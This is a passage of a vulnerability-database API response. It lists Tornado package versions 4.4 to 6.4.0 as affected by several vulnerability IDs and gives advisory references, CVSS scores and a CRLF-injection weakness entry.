"vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/35067?format=api", "purl": "pkg:pypi/tornado@4.4.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.4.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35068?format=api", "purl": "pkg:pypi/tornado@4.4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.4.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/35069?format=api", "purl": "pkg:pypi/tornado@4.4.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.4.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/35070?format=api", "purl": "pkg:pypi/tornado@4.5b1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.5b1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35071?format=api", "purl": "pkg:pypi/tornado@4.5b2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.5b2" }, { "url": "http://public2.vulnerablecode.io/api/packages/35072?format=api", "purl": "pkg:pypi/tornado@4.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/35073?format=api", "purl": "pkg:pypi/tornado@4.5.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.5.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35074?format=api", "purl": "pkg:pypi/tornado@4.5.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.5.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/35076?format=api", "purl": "pkg:pypi/tornado@4.5.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.5.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/35077?format=api", "purl": "pkg:pypi/tornado@5.0a1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@5.0a1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35078?format=api", "purl": "pkg:pypi/tornado@5.0b1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@5.0b1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35079?format=api", "purl": "pkg:pypi/tornado@5.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@5.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/35080?format=api", "purl": "pkg:pypi/tornado@5.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@5.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35081?format=api", "purl": "pkg:pypi/tornado@5.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@5.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/35082?format=api", "purl": "pkg:pypi/tornado@5.1b1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@5.1b1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35083?format=api", "purl": "pkg:pypi/tornado@5.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@5.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35084?format=api", "purl": "pkg:pypi/tornado@5.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@5.1.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35085?format=api", "purl": "pkg:pypi/tornado@6.0a1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.0a1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35086?format=api", "purl": "pkg:pypi/tornado@6.0b1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.0b1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35087?format=api", "purl": "pkg:pypi/tornado@6.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/35088?format=api", "purl": "pkg:pypi/tornado@6.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35089?format=api", "purl": "pkg:pypi/tornado@6.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/35090?format=api", "purl": "pkg:pypi/tornado@6.0.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.0.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/35091?format=api", "purl": "pkg:pypi/tornado@6.0.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.0.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/35092?format=api", "purl": "pkg:pypi/tornado@6.1b1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.1b1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35093?format=api", "purl": "pkg:pypi/tornado@6.1b2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.1b2" }, { "url": "http://public2.vulnerablecode.io/api/packages/35094?format=api", "purl": "pkg:pypi/tornado@6.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35095?format=api", "purl": "pkg:pypi/tornado@6.2b1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.2b1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35096?format=api", "purl": "pkg:pypi/tornado@6.2b2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.2b2" }, { "url": "http://public2.vulnerablecode.io/api/packages/35097?format=api", "purl": "pkg:pypi/tornado@6.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/35098?format=api", "purl": "pkg:pypi/tornado@6.3b1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.3b1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35099?format=api", "purl": "pkg:pypi/tornado@6.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/35100?format=api", "purl": "pkg:pypi/tornado@6.3.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.3.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35101?format=api", "purl": "pkg:pypi/tornado@6.3.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.3.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/59469?format=api", "purl": "pkg:pypi/tornado@6.3.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.3.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/688502?format=api", "purl": "pkg:pypi/tornado@6.4b1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.4b1" }, { "url": "http://public2.vulnerablecode.io/api/packages/688503?format=api", "purl": "pkg:pypi/tornado@6.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/145683?format=api", "purl": "pkg:pypi/tornado@6.4.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.4.0" } ], "references": [ { "reference_url": "https://github.com/tornadoweb/tornado", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado" }, { "reference_url": "https://github.com/tornadoweb/tornado/commit/7786f09f84c9f3f2012c4cf3878417cb9f053669", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado/commit/7786f09f84c9f3f2012c4cf3878417cb9f053669" }, { "reference_url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-w235-7p84-xx57", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-w235-7p84-xx57" }, { "reference_url": "https://github.com/advisories/GHSA-w235-7p84-xx57", "reference_id": "GHSA-w235-7p84-xx57", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-w235-7p84-xx57" } ], "weaknesses": [ { "cwe_id": 93, "name": "Improper Neutralization of CRLF Sequences ('CRLF Injection')", "description": "The product uses CRLF (carriage return line feeds) as a special element, e.g. to separate lines or records, but it does not neutralize or incorrectly neutralizes CRLF sequences from inputs." }, { "cwe_id": 937, "name": "OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities", "description": "Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2013." }, { "cwe_id": 1035, "name": "OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities", "description": "Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017." } ], "exploits": [], "severity_range_score": "4.0 - 6.9", "exploitability": "0.5", "weighted_severity": "6.2", "risk_score": 3.1, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-y14s-8wpj-wygd" }